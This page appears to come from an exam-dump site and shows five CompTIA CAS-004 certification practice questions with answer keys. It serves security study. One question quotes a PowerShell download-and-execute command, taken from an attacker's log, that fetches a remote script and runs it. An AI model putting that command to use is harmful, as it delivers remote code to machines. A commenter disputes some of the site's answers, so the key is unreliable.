Amazon
Avaya
Cisco
CompTIA
CrowdStrike
EC-Council
EXIN
Fortinet
Google
ISC
ISC2
ITIL
Juniper
Microsoft
NVIDIA
Okta
Palo Alto Networks
Salesforce
All Vendors
  1. Home
  2. CompTIA
  3. CAS-004

CompTIA CAS-004 Exam (page: 22)
CompTIA Advanced Security Practitioner (CASP+) CAS-004
Updated on: 12-Jan-2026

Viewing Page 22 of 112
CAS-004 PDF 645 Questions

A development team created a mobile application that contacts a company's back-end APIs housed in a PaaS environment. The APIs have been experiencing high processor utilization due to scraping activities. The security engineer needs to recommend a solution that will prevent and remedy the behavior.
Which of the following would BEST safeguard the APIs? (Choose two.)

  1. Bot protection
  2. OAuth 2.0
  3. Input validation
  4. Autoscaling endpoints
  5. Rate limiting
  6. CSRF protection

Answer(s): A,E


Reference:

https://stackoverflow.com/questions/3161548/how-do-i-prevent-site-scraping



An organization's existing infrastructure includes site-to-site VPNs between datacenters. In the past year, a sophisticated attacker exploited a zero-day vulnerability on the VPN concentrator. Consequently, the Chief Information Security Officer (CISO) is making infrastructure changes to mitigate the risk of service loss should another zero-day exploit be used against the VPN solution.
Which of the following designs would be BEST for the CISO to use?

  1. Adding a second redundant layer of alternate vendor VPN concentrators
  2. Using Base64 encoding within the existing site-to-site VPN connections
  3. Distributing security resources across VPN sites
  4. Implementing IDS services with each VPN concentrator
  5. Transitioning to a container-based architecture for site-based services

Answer(s): A



A local government that is investigating a data exfiltration claim was asked to review the fingerprint of the malicious user's actions. An investigator took a forensic image of the VM and downloaded the image to a secured USB drive to share with the government.
Which of the following should be taken into consideration during the process of releasing the drive to the government?

  1. Encryption in transit
  2. Legal issues
  3. Chain of custody
  4. Order of volatility
  5. Key exchange

Answer(s): C



A security analyst has noticed a steady increase in the number of failed login attempts to the external-facing mail server. During an investigation of one of the jump boxes, the analyst identified the following in the log file: powershell `IEX(New-Object Net.WebClient).DownloadString ('https://content.comptia.org/casp/whois.psl');whois`
Which of the following security controls would have alerted and prevented the next phase of the attack?

  1. Antivirus and UEBA
  2. Reverse proxy and sandbox
  3. EDR and application approved list
  4. Forward proxy and MFA

Answer(s): C



As part of its risk strategy, a company is considering buying insurance for cybersecurity incidents.
Which of the following BEST describes this kind of risk response?

  1. Risk rejection
  2. Risk mitigation
  3. Risk transference
  4. Risk avoidance

Answer(s): C


Reference:

https://hbr.org/2021/01/cybersecurity-insurance-has-a-big-problem



Viewing Page 22 of 112



Share your comments for CompTIA CAS-004 exam with other users:

9eagles 4/7/2023 10:04:00 AM

on question 10 and so far 2 wrong answers as evident in the included reference link.
Anonymous